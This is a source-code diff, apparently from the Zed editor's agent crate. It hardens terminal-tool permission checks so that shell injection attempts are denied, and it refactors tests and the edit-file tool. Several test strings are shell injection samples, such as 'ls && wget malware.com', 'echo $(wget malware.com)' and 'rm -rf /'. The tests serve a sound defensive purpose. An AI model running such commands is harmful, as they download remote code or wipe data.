cannot be overridden by any setting. /// These protect against catastrophic operations like wiping filesystems. @@ -256,7 +262,30 @@ impl ToolPermissionDecision { return denial; } - let rules = match permissions.tools.get(tool_name) { + let rules = permissions.tools.get(tool_name); + + // Check for invalid regex patterns before evaluating rules. + // If any patterns failed to compile, block the tool call entirely. + if let Some(error) = rules.and_then(|rules| check_invalid_patterns(tool_name, rules)) { + return ToolPermissionDecision::Deny(error); + } + + if tool_name == TerminalTool::NAME + && !rules.map_or( + matches!(permissions.default, ToolPermissionMode::Allow), + |rules| is_unconditional_allow_all(rules, permissions.default), + ) + && inputs.iter().any(|input| { + matches!( + validate_terminal_command(input), + TerminalCommandValidation::Unsafe | TerminalCommandValidation::Unsupported + ) + }) + { + return ToolPermissionDecision::Deny(INVALID_TERMINAL_COMMAND_MESSAGE.into()); + } + + let rules = match rules { Some(rules) => rules, None => { // No tool-specific rules, use the global default @@ -270,12 +299,6 @@ impl ToolPermissionDecision { } }; - // Check for invalid regex patterns before evaluating rules. - // If any patterns failed to compile, block the tool call entirely. - if let Some(error) = check_invalid_patterns(tool_name, rules) { - return ToolPermissionDecision::Deny(error); - } - // For the terminal tool, parse each input command to extract all sub-commands. // This prevents shell injection attacks where a user configures an allow // pattern like "^ls" and an attacker crafts "ls && rm -rf /". @@ -407,6 +430,18 @@ fn check_commands( } } +fn is_unconditional_allow_all(rules: &ToolRules, global_default: ToolPermissionMode) -> bool { + // `always_allow` is intentionally not checked here: when the effective default + // is already Allow and there are no deny/confirm restrictions, allow patterns + // are redundant — the user has opted into allowing everything. + rules.always_deny.is_empty() + && rules.always_confirm.is_empty() + && matches!( + rules.default.unwrap_or(global_default), + ToolPermissionMode::Allow + ) +} + /// Checks if the tool rules contain any invalid regex patterns. /// Returns an error message if invalid patterns are found. fn check_invalid_patterns(tool_name: &str, rules: &ToolRules) -> Option { @@ -528,7 +563,7 @@ mod tests { use crate::tools::{DeletePathTool, EditFileTool, FetchTool, TerminalTool}; use agent_settings::{AgentProfileId, CompiledRegex, InvalidRegexPattern, ToolRules}; use gpui::px; - use settings::{DefaultAgentView, DockPosition, NotifyWhenAgentWaiting}; + use settings::{DockPosition, NotifyWhenAgentWaiting, PlaySoundWhenAgentDone}; use std::sync::Arc; fn test_agent_settings(tool_permissions: ToolPermissions) -> AgentSettings { @@ -536,6 +571,7 @@ mod tests { enabled: true, button: true, dock: DockPosition::Right, + flexible: true, default_width: px(300.), default_height: px(600.), default_model: None, @@ -546,10 +582,9 @@ mod tests { inline_alternatives: vec![], favorite_models: vec![], default_profile: AgentProfileId::default(), - default_view: DefaultAgentView::Thread, profiles: Default::default(), notify_when_agent_waiting: NotifyWhenAgentWaiting::default(), - play_sound_when_agent_done: false, + play_sound_when_agent_done: PlaySoundWhenAgentDone::default(), single_file_review: false, model_parameters: vec![], enable_feedback: false, @@ -560,6 +595,10 @@ mod tests { message_editor_min_lines: 1, tool_permissions, show_turn_stats: false, + show_merge_conflict_indicator: true, + new_thread_location: Default::default(), + sidebar_side: Default::default(), + thinking_display: Default::default(), } } @@ -1066,6 +1105,107 @@ mod tests { )); } + #[test] + fn invalid_substitution_bearing_command_denies_by_default() { + let decision = no_rules("echo $HOME", ToolPermissionMode::Deny); + assert!(matches!(decision, ToolPermissionDecision::Deny(_))); + } + + #[test] + fn invalid_substitution_bearing_command_denies_in_confirm_mode() { + let decision = no_rules("echo $(whoami)", ToolPermissionMode::Confirm); + assert!(matches!(decision, ToolPermissionDecision::Deny(_))); + } + + #[test] + fn unconditional_allow_all_bypasses_invalid_command_rejection_without_tool_rules() { + let decision = no_rules("echo $HOME", ToolPermissionMode::Allow); + assert_eq!(decision, ToolPermissionDecision::Allow); + } + + #[test] + fn unconditional_allow_all_bypasses_invalid_command_rejection_with_terminal_default_allow() { + let mut tools = collections::HashMap::default(); + tools.insert( + Arc::from(TerminalTool::NAME), + ToolRules { + default: Some(ToolPermissionMode::Allow), + always_allow: vec![], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + let permissions = ToolPermissions { + default: ToolPermissionMode::Confirm, + tools, + }; + + assert_eq!( + ToolPermissionDecision::from_input( + TerminalTool::NAME, + &["echo $(whoami)".to_string()], + &permissions, + ShellKind::Posix, + ), + ToolPermissionDecision::Allow + ); + } + + #[test] + fn old_anchored_pattern_no_longer_matches_env_prefixed_command() { + t("PAGER=blah git log").allow(&["^git\\b"]).is_confirm(); + } + + #[test] + fn env_prefixed_allow_pattern_matches_env_prefixed_command() { + t("PAGER=blah git log --oneline") + .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"]) + .is_allow(); + } + + #[test] + fn env_prefixed_allow_pattern_requires_matching_env_value() { + t("PAGER=more git log --oneline") + .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"]) + .is_confirm(); + } + + #[test] + fn env_prefixed_allow_patterns_require_all_extracted_commands_to_match() { + t("PAGER=blah git log && git status") + .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"]) + .is_confirm(); + } + + #[test] + fn hardcoded_security_denial_overrides_unconditional_allow_all() { + let decision = no_rules("rm -rf /", ToolPermissionMode::Allow); + match decision { + ToolPermissionDecision::Deny(message) => { + assert!( + message.contains("built-in security rule"), + "expected hardcoded denial message, got: {message}" + ); + } + other => panic!("expected Deny, got {other:?}"), + } + } + + #[test] + fn hardcoded_security_denial_overrides_unconditional_allow_all_for_invalid_command() { + let decision = no_rules("echo $(rm -rf /)", ToolPermissionMode::Allow); + match decision { + ToolPermissionDecision::Deny(message) => { + assert!( + message.contains("built-in security rule"), + "expected hardcoded denial message, got: {message}" + ); + } + other => panic!("expected Deny, got {other:?}"), + } + } + #[test] fn shell_injection_via_double_ampersand_not_allowed() { t("ls && wget malware.com").allow(&["^ls"]).is_confirm(); @@ -1085,14 +1225,14 @@ mod tests { fn shell_injection_via_backticks_not_allowed() { t("echo `wget malware.com`") .allow(&[pattern("echo")]) - .is_confirm(); + .is_deny(); } #[test] fn shell_injection_via_dollar_parens_not_allowed() { t("echo $(wget malware.com)") .allow(&[pattern("echo")]) - .is_confirm(); + .is_deny(); } #[test] @@ -1112,12 +1252,12 @@ mod tests { #[test] fn shell_injection_via_process_substitution_input_not_allowed() { - t("cat <(wget malware.com)").allow(&["^cat"]).is_confirm(); + t("cat <(wget malware.com)").allow(&["^cat"]).is_deny(); } #[test] fn shell_injection_via_process_substitution_output_not_allowed() { - t("ls >(wget malware.com)").allow(&["^ls"]).is_confirm(); + t("ls >(wget malware.com)").allow(&["^ls"]).is_deny(); } #[test] @@ -1268,15 +1408,15 @@ mod tests { } #[test] - fn nested_command_substitution_all_checked() { + fn nested_command_substitution_is_denied() { t("echo $(cat $(whoami).txt)") .allow(&["^echo", "^cat", "^whoami"]) - .is_allow(); + .is_deny(); } #[test] - fn parse_failure_falls_back_to_confirm() { - t("ls &&").allow(&["^ls$"]).is_confirm(); + fn parse_failure_is_denied() { + t("ls &&").allow(&["^ls$"]).is_deny(); } #[test] diff --git a/crates/agent/src/tools.rs b/crates/agent/src/tools.rs index b2724801befc7459ad37494d298819f4b7ca6b27..f3a6ac7ec6d139a2f464ce5ca4229ffdb4564714 100644 --- a/crates/agent/src/tools.rs +++ b/crates/agent/src/tools.rs @@ -4,6 +4,8 @@ mod create_directory_tool; mod delete_path_tool; mod diagnostics_tool; mod edit_file_tool; +#[cfg(all(test, feature = "unit-eval"))] +mod evals; mod fetch_tool; mod find_path_tool; mod grep_tool; @@ -17,7 +19,9 @@ mod save_file_tool; mod spawn_agent_tool; mod streaming_edit_file_tool; mod terminal_tool; +mod tool_edit_parser; mod tool_permissions; +mod update_plan_tool; mod web_search_tool; use crate::AgentTool; @@ -43,6 +47,7 @@ pub use spawn_agent_tool::*; pub use streaming_edit_file_tool::*; pub use terminal_tool::*; pub use tool_permissions::*; +pub use update_plan_tool::*; pub use web_search_tool::*; macro_rules! tools { @@ -131,5 +136,6 @@ tools! { SaveFileTool, SpawnAgentTool, TerminalTool, + UpdatePlanTool, WebSearchTool, } diff --git a/crates/agent/src/tools/context_server_registry.rs b/crates/agent/src/tools/context_server_registry.rs index 1c7590d8097a5de50b879d5b253c5dbabd3dcbab..df4cc313036b55e8842a9c46567256afb92ed944 100644 --- a/crates/agent/src/tools/context_server_registry.rs +++ b/crates/agent/src/tools/context_server_registry.rs @@ -253,12 +253,14 @@ impl ContextServerRegistry { let project::context_server_store::ServerStatusChangedEvent { server_id, status } = event; match status { - ContextServerStatus::Starting => {} + ContextServerStatus::Starting | ContextServerStatus::Authenticating => {} ContextServerStatus::Running => { self.reload_tools_for_server(server_id.clone(), cx); self.reload_prompts_for_server(server_id.clone(), cx); } - ContextServerStatus::Stopped | ContextServerStatus::Error(_) => { + ContextServerStatus::Stopped + | ContextServerStatus::Error(_) + | ContextServerStatus::AuthRequired => { if let Some(registered_server) = self.registered_servers.remove(server_id) { if !registered_server.tools.is_empty() { cx.emit(ContextServerRegistryEvent::ToolsChanged); diff --git a/crates/agent/src/tools/copy_path_tool.rs b/crates/agent/src/tools/copy_path_tool.rs index 7f53a5c36a7979a01de96535f19e421fa3119e16..06600f64874851c8d703513ea006d7f0327a0952 100644 --- a/crates/agent/src/tools/copy_path_tool.rs +++ b/crates/agent/src/tools/copy_path_tool.rs @@ -266,7 +266,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -372,13 +375,16 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Expected a single authorization prompt", ); @@ -444,8 +450,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); diff --git a/crates/agent/src/tools/create_directory_tool.rs b/crates/agent/src/tools/create_directory_tool.rs index 5d8930f3c7400428d55cfe7d14bafc16d94be43a..60bb44e39ee5ab76168d909c08889cbbbc63f9f4 100644 --- a/crates/agent/src/tools/create_directory_tool.rs +++ b/crates/agent/src/tools/create_directory_tool.rs @@ -241,7 +241,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -359,13 +362,16 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Expected a single authorization prompt", ); @@ -434,8 +440,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); diff --git a/crates/agent/src/tools/delete_path_tool.rs b/crates/agent/src/tools/delete_path_tool.rs index 27ab68db667a4cf3223e6521682814dc1c245bb7..21b4674425d9169e7740dd35c929302814006684 100644 --- a/crates/agent/src/tools/delete_path_tool.rs +++ b/crates/agent/src/tools/delete_path_tool.rs @@ -301,7 +301,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -428,13 +431,16 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Expected a single authorization prompt", ); @@ -507,8 +513,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index 3e1e0661f126d464c8d4611e2b3d85a9f668a5ca..9bcf164096b99675febd3d7ae1bde8341f7c5ff8 100644 --- a/crates/agent/src/tools/edit_file_tool.rs +++ b/crates/agent/src/tools/edit_file_tool.rs @@ -3,19 +3,18 @@ use super::save_file_tool::SaveFileTool; use super::tool_permissions::authorize_file_edit; use crate::{ AgentTool, Templates, Thread, ToolCallEventStream, ToolInput, - edit_agent::{EditAgent, EditAgentOutput, EditAgentOutputEvent, EditFormat}, + edit_agent::{EditAgent, EditAgentOutputEvent, EditFormat}, }; use acp_thread::Diff; use agent_client_protocol::{self as acp, ToolCallLocation, ToolCallUpdateFields}; use anyhow::{Context as _, Result}; -use cloud_llm_client::CompletionIntent; use collections::HashSet; use futures::{FutureExt as _, StreamExt as _}; use gpui::{App, AppContext, AsyncApp, Entity, Task, WeakEntity}; use indoc::formatdoc; use language::language_settings::{self, FormatOnSave}; use language::{LanguageRegistry, ToPoint}; -use language_model::LanguageModelToolResultContent; +use language_model::{CompletionIntent, LanguageModelToolResultContent}; use project::lsp_store::{FormatTrigger, LspFormatTarget}; use project::{Project, ProjectPath}; use schemars::JsonSchema; @@ -104,8 +103,6 @@ pub enum EditFileToolOutput { old_text: Arc, #[serde(default)] diff: String, - #[serde(alias = "raw_output")] - edit_agent_output: EditAgentOutput, }, Error { error: String, @@ -253,7 +250,7 @@ impl AgentTool for EditFileTool { error: "thread was dropped".to_string(), })?; - let (project_path, abs_path, allow_thinking, authorize) = + let (project_path, abs_path, allow_thinking, update_agent_location, authorize) = cx.update(|cx| { let project_path = resolve_path(&input, project.clone(), cx).map_err(|err| { EditFileToolOutput::Error { @@ -271,8 +268,11 @@ impl AgentTool for EditFileTool { .thread .read_with(cx, |thread, _cx| thread.thinking_enabled()) .unwrap_or(true); + + let update_agent_location = self.thread.read_with(cx, |thread, _cx| !thread.is_subagent()).unwrap_or_default(); + let authorize = self.authorize(&input, &event_stream, cx); - Ok::<_, EditFileToolOutput>((project_path, abs_path, allow_thinking, authorize)) + Ok::<_, EditFileToolOutput>((project_path, abs_path, allow_thinking, update_agent_location, authorize)) })?; let result: anyhow::Result = async { @@ -293,6 +293,7 @@ impl AgentTool for EditFileTool { self.templates.clone(), edit_format, allow_thinking, + update_agent_location, ); let buffer = project @@ -303,13 +304,13 @@ impl AgentTool for EditFileTool { // Check if the file has been modified since the agent last read it if let Some(abs_path) = abs_path.as_ref() { - let (last_read_mtime, current_mtime, is_dirty, has_save_tool, has_restore_tool) = self.thread.update(cx, |thread, cx| { - let last_read = thread.file_read_times.get(abs_path).copied(); + let last_read_mtime = action_log.read_with(cx, |log, _| log.file_read_time(abs_path)); + let (current_mtime, is_dirty, has_save_tool, has_restore_tool) = self.thread.read_with(cx, |thread, cx| { let current = buffer.read(cx).file().and_then(|file| file.disk_state().mtime()); let dirty = buffer.read(cx).is_dirty(); let has_save = thread.has_tool(SaveFileTool::NAME); let has_restore = thread.has_tool(RestoreFileFromDiskTool::NAME); - (last_read, current, dirty, has_save, has_restore) + (current, dirty, has_save, has_restore) })?; // Check for unsaved changes first - these indicate modifications we don't know about @@ -417,29 +418,14 @@ impl AgentTool for EditFileTool { EditAgentOutputEvent::AmbiguousEditRange(ranges) => ambiguous_ranges = ranges, EditAgentOutputEvent::ResolvingEditRange(range) => { diff.update(cx, |card, cx| card.reveal_range(range.clone(), cx)); - // if !emitted_location { - // let line = buffer.update(cx, |buffer, _cx| { - // range.start.to_point(&buffer.snapshot()).row - // }).ok(); - // if let Some(abs_path) = abs_path.clone() { - // event_stream.update_fields(ToolCallUpdateFields { - // locations: Some(vec![ToolCallLocation { path: abs_path, line }]), - // ..Default::default() - // }); - // } - // } } } } - let edit_agent_output = output.await?; + output.await?; let format_on_save_enabled = buffer.read_with(cx, |buffer, cx| { - let settings = language_settings::language_settings( - buffer.language().map(|l| l.name()), - buffer.file(), - cx, - ); + let settings = language_settings::LanguageSettings::for_buffer(buffer, cx); settings.format_on_save != FormatOnSave::Off }); @@ -468,17 +454,6 @@ impl AgentTool for EditFileTool { log.buffer_edited(buffer.clone(), cx); }); - // Update the recorded read time after a successful edit so consecutive edits work - if let Some(abs_path) = abs_path.as_ref() { - if let Some(new_mtime) = buffer.read_with(cx, |buffer, _| { - buffer.file().and_then(|file| file.disk_state().mtime()) - }) { - self.thread.update(cx, |thread, _| { - thread.file_read_times.insert(abs_path.to_path_buf(), new_mtime); - })?; - } - } - let new_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); let (new_text, unified_diff) = cx .background_spawn({ @@ -524,7 +499,6 @@ impl AgentTool for EditFileTool { new_text, old_text, diff: unified_diff, - edit_agent_output, }) }.await; result @@ -1214,7 +1188,7 @@ mod tests { }) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); // Test 4: Path with .zed in the middle should require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); @@ -1277,7 +1251,7 @@ mod tests { }) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); // 5.3: Normal in-project path with allow — no confirmation needed let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); @@ -1294,7 +1268,7 @@ mod tests { }) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); // 5.4: With Confirm default, non-project paths still prompt cx.update(|cx| { @@ -1384,7 +1358,10 @@ mod tests { event .response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); authorize_task.await.unwrap(); } @@ -1609,8 +1586,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - stream_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + stream_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); @@ -1681,7 +1658,7 @@ mod tests { } else { auth.await.unwrap(); assert!( - stream_rx.try_next().is_err(), + stream_rx.try_recv().is_err(), "Failed for case: {} - path: {} - expected no confirmation but got one", description, path @@ -1792,7 +1769,7 @@ mod tests { } else { auth.await.unwrap(); assert!( - stream_rx.try_next().is_err(), + stream_rx.try_recv().is_err(), "Failed for case: {} - path: {} - expected no confirmation but got one", description, path @@ -1885,7 +1862,7 @@ mod tests { stream_rx.expect_authorization().await; } else { assert!( - stream_rx.try_next().is_err(), + stream_rx.try_recv().is_err(), "Failed for case: {} - path: {} - expected no confirmation but got one", description, path @@ -1986,7 +1963,7 @@ mod tests { }) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); } } @@ -2211,14 +2188,18 @@ mod tests { let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); // Initially, file_read_times should be empty - let is_empty = thread.read_with(cx, |thread, _| thread.file_read_times.is_empty()); + let is_empty = action_log.read_with(cx, |action_log, _| { + action_log + .file_read_time(path!("/root/test.txt").as_ref()) + .is_none() + }); assert!(is_empty, "file_read_times should start empty"); // Create read tool let read_tool = Arc::new(crate::ReadFileTool::new( - thread.downgrade(), project.clone(), - action_log, + action_log.clone(), + true, )); // Read the file to record the read time @@ -2237,12 +2218,9 @@ mod tests { .unwrap(); // Verify that file_read_times now contains an entry for the file - let has_entry = thread.read_with(cx, |thread, _| { - thread.file_read_times.len() == 1 - && thread - .file_read_times - .keys() - .any(|path| path.ends_with("test.txt")) + let has_entry = action_log.read_with(cx, |log, _| { + log.file_read_time(path!("/root/test.txt").as_ref()) + .is_some() }); assert!( has_entry, @@ -2264,11 +2242,14 @@ mod tests { .await .unwrap(); - // Should still have exactly one entry - let has_one_entry = thread.read_with(cx, |thread, _| thread.file_read_times.len() == 1); + // Should still have an entry after re-reading + let has_entry = action_log.read_with(cx, |log, _| { + log.file_read_time(path!("/root/test.txt").as_ref()) + .is_some() + }); assert!( - has_one_entry, - "file_read_times should still have one entry after re-reading" + has_entry, + "file_read_times should still have an entry after re-reading" ); } @@ -2308,11 +2289,7 @@ mod tests { let languages = project.read_with(cx, |project, _| project.languages().clone()); let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - let read_tool = Arc::new(crate::ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log, - )); + let read_tool = Arc::new(crate::ReadFileTool::new(project.clone(), action_log, true)); let edit_tool = Arc::new(EditFileTool::new( project.clone(), thread.downgrade(), @@ -2422,11 +2399,7 @@ mod tests { let languages = project.read_with(cx, |project, _| project.languages().clone()); let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - let read_tool = Arc::new(crate::ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log, - )); + let read_tool = Arc::new(crate::ReadFileTool::new(project.clone(), action_log, true)); let edit_tool = Arc::new(EditFileTool::new( project.clone(), thread.downgrade(), @@ -2533,11 +2506,7 @@ mod tests { let languages = project.read_with(cx, |project, _| project.languages().clone()); let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - let read_tool = Arc::new(crate::ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log, - )); + let read_tool = Arc::new(crate::ReadFileTool::new(project.clone(), action_log, true)); let edit_tool = Arc::new(EditFileTool::new( project.clone(), thread.downgrade(), diff --git a/crates/agent/src/tools/evals.rs b/crates/agent/src/tools/evals.rs new file mode 100644 index 0000000000000000000000000000000000000000..13b8413de6455c9e5b4f719ba079a136ac857b9d --- /dev/null +++ b/crates/agent/src/tools/evals.rs @@ -0,0 +1,2 @@ +#[cfg(all(test, feature = "unit-eval"))] +mod streaming_edit_file; diff --git a/crates/agent/src/tools/evals/fixtures/add_overwrite_test/before.rs b/crates/agent/src/tools/evals/fixtures/add_overwrite_test/before.rs new file mode 100644 index 0000000000000000000000000000000000000000..0d2a0be1fb889a74d0251e1493e6988aaded068e --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/add_overwrite_test/before.rs @@ -0,0 +1,1572 @@ +use anyhow::{Context as _, Result}; +use buffer_diff::BufferDiff; +use collections::BTreeMap; +use futures::{StreamExt, channel::mpsc}; +use gpui::{App, AppContext, AsyncApp, Context, Entity, Subscription, Task, WeakEntity}; +use language::{Anchor, Buffer, BufferEvent, DiskState, Point, ToPoint}; +use project::{Project, ProjectItem, lsp_store::OpenLspBufferHandle}; +use std::{cmp, ops::Range, sync::Arc}; +use text::{Edit, Patch, Rope}; +use util::RangeExt; + +/// Tracks actions performed by tools in a thread +pub struct ActionLog { + /// Buffers that we want to notify the model about when they change. + tracked_buffers: BTreeMap, TrackedBuffer>, + /// Has the model edited a file since it last checked diagnostics? + edited_since_project_diagnostics_check: bool, + /// The project this action log is associated with + project: Entity, +} + +impl ActionLog { + /// Creates a new, empty action log associated with the given project. + pub fn new(project: Entity) -> Self { + Self { + tracked_buffers: BTreeMap::default(), + edited_since_project_diagnostics_check: false, + project, + } + } + + pub fn project(&self) -> &Entity { + &self.project + } + + /// Notifies a diagnostics check + pub fn checked_project_diagnostics(&mut self) { + self.edited_since_project_diagnostics_check = false; + } + + /// Returns true if any files have been edited since the last project diagnostics check + pub fn has_edited_files_since_project_diagnostics_check(&self) -> bool { + self.edited_since_project_diagnostics_check + } + + fn track_buffer_internal( + &mut self, + buffer: Entity, + is_created: bool, + cx: &mut Context, + ) -> &mut TrackedBuffer { + let tracked_buffer = self + .tracked_buffers + .entry(buffer.clone()) + .or_insert_with(|| { + let open_lsp_handle = self.project.update(cx, |project, cx| { + project.register_buffer_with_language_servers(&buffer, cx) + }); + + let text_snapshot = buffer.read(cx).text_snapshot(); + let diff = cx.new(|cx| BufferDiff::new(&text_snapshot, cx)); + let (diff_update_tx, diff_update_rx) = mpsc::unbounded(); + let base_text; + let status; + let unreviewed_changes; + if is_created { + base_text = Rope::default(); + status = TrackedBufferStatus::Created; + unreviewed_changes = Patch::new(vec![Edit { + old: 0..1, + new: 0..text_snapshot.max_point().row + 1, + }]) + } else { + base_text = buffer.read(cx).as_rope().clone(); + status = TrackedBufferStatus::Modified; + unreviewed_changes = Patch::default(); + } + TrackedBuffer { + buffer: buffer.clone(), + base_text, + unreviewed_changes, + snapshot: text_snapshot.clone(), + status, + version: buffer.read(cx).version(), + diff, + diff_update: diff_update_tx, + _open_lsp_handle: open_lsp_handle, + _maintain_diff: cx.spawn({ + let buffer = buffer.clone(); + async move |this, cx| { + Self::maintain_diff(this, buffer, diff_update_rx, cx) + .await + .ok(); + } + }), + _subscription: cx.subscribe(&buffer, Self::handle_buffer_event), + } + }); + tracked_buffer.version = buffer.read(cx).version(); + tracked_buffer + } + + fn handle_buffer_event( + &mut self, + buffer: Entity, + event: &BufferEvent, + cx: &mut Context, + ) { + match event { + BufferEvent::Edited { .. } => self.handle_buffer_edited(buffer, cx), + BufferEvent::FileHandleChanged => { + self.handle_buffer_file_changed(buffer, cx); + } + _ => {} + }; + } + + fn handle_buffer_edited(&mut self, buffer: Entity, cx: &mut Context) { + let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { + return; + }; + tracked_buffer.schedule_diff_update(ChangeAuthor::User, cx); + } + + fn handle_buffer_file_changed(&mut self, buffer: Entity, cx: &mut Context) { + let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { + return; + }; + + match tracked_buffer.status { + TrackedBufferStatus::Created | TrackedBufferStatus::Modified => { + if buffer + .read(cx) + .file() + .map_or(false, |file| file.disk_state() == DiskState::Deleted) + { + // If the buffer had been edited by a tool, but it got + // deleted externally, we want to stop tracking it. + self.tracked_buffers.remove(&buffer); + } + cx.notify(); + } + TrackedBufferStatus::Deleted => { + if buffer + .read(cx) + .file() + .map_or(false, |file| file.disk_state() != DiskState::Deleted) + { + // If the buffer had been deleted by a tool, but it got + // resurrected externally, we want to clear the changes we + // were tracking and reset the buffer's state. + self.tracked_buffers.remove(&buffer); + self.track_buffer_internal(buffer, false, cx); + } + cx.notify(); + } + } + } + + async fn maintain_diff( + this: WeakEntity, + buffer: Entity, + mut diff_update: mpsc::UnboundedReceiver<(ChangeAuthor, text::BufferSnapshot)>, + cx: &mut AsyncApp, + ) -> Result<()> { + while let Some((author, buffer_snapshot)) = diff_update.next().await { + let (rebase, diff, language, language_registry) = + this.read_with(cx, |this, cx| { + let tracked_buffer = this + .tracked_buffers + .get(&buffer) + .context("buffer not tracked")?; + + let rebase = cx.background_spawn({ + let mut base_text = tracked_buffer.base_text.clone(); + let old_snapshot = tracked_buffer.snapshot.clone(); + let new_snapshot = buffer_snapshot.clone(); + let unreviewed_changes = tracked_buffer.unreviewed_changes.clone(); + async move { + let edits = diff_snapshots(&old_snapshot, &new_snapshot); + if let ChangeAuthor::User = author { + apply_non_conflicting_edits( + &unreviewed_changes, + edits, + &mut base_text, + new_snapshot.as_rope(), + ); + } + (Arc::new(base_text.to_string()), base_text) + } + }); + + anyhow::Ok(( + rebase, + tracked_buffer.diff.clone(), + tracked_buffer.buffer.read(cx).language().cloned(), + tracked_buffer.buffer.read(cx).language_registry(), + )) + })??; + + let (new_base_text, new_base_text_rope) = rebase.await; + let diff_snapshot = BufferDiff::update_diff( + diff.clone(), + buffer_snapshot.clone(), + Some(new_base_text), + true, + false, + language, + language_registry, + cx, + ) + .await; + + let mut unreviewed_changes = Patch::default(); + if let Ok(diff_snapshot) = diff_snapshot { + unreviewed_changes = cx + .background_spawn({ + let diff_snapshot = diff_snapshot.clone(); + let buffer_snapshot = buffer_snapshot.clone(); + let new_base_text_rope = new_base_text_rope.clone(); + async move { + let mut unreviewed_changes = Patch::default(); + for hunk in diff_snapshot.hunks_intersecting_range( + Anchor::MIN..Anchor::MAX, + &buffer_snapshot, + ) { + let old_range = new_base_text_rope + .offset_to_point(hunk.diff_base_byte_range.start) + ..new_base_text_rope + .offset_to_point(hunk.diff_base_byte_range.end); + let new_range = hunk.range.start..hunk.range.end; + unreviewed_changes.push(point_to_row_edit( + Edit { + old: old_range, + new: new_range, + }, + &new_base_text_rope, + &buffer_snapshot.as_rope(), + )); + } + unreviewed_changes + } + }) + .await; + + diff.update(cx, |diff, cx| { + diff.set_snapshot(diff_snapshot, &buffer_snapshot, cx) + })?; + } + this.update(cx, |this, cx| { + let tracked_buffer = this + .tracked_buffers + .get_mut(&buffer) + .context("buffer not tracked")?; + tracked_buffer.base_text = new_base_text_rope; + 